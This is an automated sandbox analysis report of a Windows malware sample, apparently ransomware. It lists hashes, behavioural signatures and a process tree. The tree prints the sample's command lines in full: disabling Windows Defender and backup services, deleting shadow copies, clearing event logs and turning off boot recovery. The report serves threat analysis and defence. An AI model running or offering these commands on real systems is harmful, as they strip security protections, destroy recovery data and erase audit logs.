Analysis

  • max time kernel
    13s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-03-2024 15:04

General

  • Target

    3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe

  • Size

    3.4MB

  • MD5

    3e3c64d90fb826c80e45d9f8791f76fe

  • SHA1

    c7c893ef8d3550c773b3523f7c35a827cb65cc5f

  • SHA256

    de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf

  • SHA512

    ad2cc2abe25800e09c2c34a8943fc5698f28b59e59fb3d89c1993666a75cec42d119bc858c4fdc5114c5ad7b2416e1479811e3047a47c679d72360a536299115

  • SSDEEP

    49152:i2cDtPjVrb/TVvO90dL3BmAFd4A64nsfJurbOysDrVyOYF1w86FmCKenPr8bg11I:i2yj7nO7Dpy/Zi4JJOgQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:836
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:4224
        • C:\Windows\SYSTEM32\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:1844
          • C:\Windows\SYSTEM32\net.exe
            net.exe stop "vmicvss" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4912
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "vmicvss" /y
              3⤵
                PID:4964
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "VSS" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4164
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "VSS" /y
                3⤵
                  PID:3060
              • C:\Windows\SYSTEM32\net.exe
                net.exe stop "wbengine" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3852
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "wbengine" /y
                  3⤵
                    PID:3064
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "WebClient" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2928
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "WebClient" /y
                    3⤵
                      PID:5012
                  • C:\Windows\SYSTEM32\net.exe
                    net.exe stop "UnistoreSvc_2cb1f" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3356
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "UnistoreSvc_2cb1f" /y
                      3⤵
                        PID:3496
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SamSs" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:3888
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SDRSVC" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:4780
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SstpSvc" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2828
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "vmicvss" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:4352
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "VSS" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:4720
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "wbengine" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:752
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "WebClient" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2604
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "UnistoreSvc_2cb1f" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:3848
                    • C:\Windows\SYSTEM32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:2320
                      • C:\Windows\SYSTEM32\reg.exe
                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                        2⤵
                          PID:1808
                        • C:\Windows\SYSTEM32\reg.exe
                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                          2⤵
                            PID:3272
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            2⤵
                              PID:4424
                            • C:\Windows\SYSTEM32\reg.exe
                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                              2⤵
                                PID:1944
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:2304
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:3476
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1140
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:4968
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                2⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:4028
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                2⤵
                                  PID:4856
                                • C:\Windows\SYSTEM32\reg.exe
                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:1592
                                  • C:\Windows\SYSTEM32\reg.exe
                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:4704
                                    • C:\Windows\SYSTEM32\reg.exe
                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:836
                                      • C:\Windows\SYSTEM32\reg.exe
                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:2364
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:4208
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                            2⤵
                                              PID:4792
                                            • C:\Windows\SYSTEM32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                              2⤵
                                                PID:1704
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                2⤵
                                                  PID:4460
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  2⤵
                                                    PID:1368
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                    2⤵
                                                      PID:2908
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                      2⤵
                                                        PID:2080
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                        2⤵
                                                          PID:2148
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                          2⤵
                                                            PID:868
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                            2⤵
                                                              PID:4592
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                              2⤵
                                                                PID:2436
                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                2⤵
                                                                  PID:4416
                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                  2⤵
                                                                    PID:2796
                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                    2⤵
                                                                      PID:2900
                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                      2⤵
                                                                        PID:3568
                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                        2⤵
                                                                          PID:3832
                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                          • Modifies security service
                                                                          PID:4472
                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                          2⤵
                                                                            PID:4200
                                                                          • C:\Windows\SYSTEM32\vssadmin.exe
                                                                            vssadmin.exe delete shadows /all /quiet
                                                                            2⤵
                                                                            • Interacts with shadow copies
                                                                            PID:3964
                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                            wevtutil.exe cl system
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4252
                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                            wevtutil.exe cl security
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1544
                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                            wevtutil.exe cl application
                                                                            2⤵
                                                                            • Clears Windows event logs
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3572
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1872
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe shadowcopy delete
                                                                            2⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2960
                                                                          • C:\Windows\SYSTEM32\bcdedit.exe
                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:2052
                                                                          • C:\Windows\SYSTEM32\bcdedit.exe
                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                            2⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:4392
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                            2⤵
                                                                              PID:2812
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                              2⤵
                                                                                PID:4420
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  3⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:228
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                2⤵
                                                                                  PID:1208
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1956

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                SHA1

                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                SHA256

                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                SHA512

                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                6d42b6da621e8df5674e26b799c8e2aa

                                                                                SHA1

                                                                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                SHA256

                                                                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                SHA512

                                                                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lih2hdf0.kpx.ps1

                                                                                Filesize

                                                                                60B

                                                                                MD5

                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                SHA1

                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                SHA256

                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                SHA512

                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                              • memory/228-2-0x000002156BF70000-0x000002156BF92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/228-12-0x00007FF848550000-0x00007FF849011000-memory.dmp

                                                                                Filesize

                                                                                10.8MB

                                                                              • memory/228-13-0x000002156BFD0000-0x000002156BFE0000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/228-14-0x000002156BFD0000-0x000002156BFE0000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/228-17-0x00007FF848550000-0x00007FF849011000-memory.dmp

                                                                                Filesize

                                                                                10.8MB

                                                                              • memory/1956-19-0x00007FF848200000-0x00007FF848CC1000-memory.dmp

                                                                                Filesize

                                                                                10.8MB

                                                                              • memory/1956-20-0x0000028A7C1C0000-0x0000028A7C1D0000-memory.dmp

                                                                                Filesize

                                                                                64KB

                                                                              • memory/1956-32-0x00007FF848200000-0x00007FF848CC1000-memory.dmp

                                                                                Filesize

                                                                                10.8MB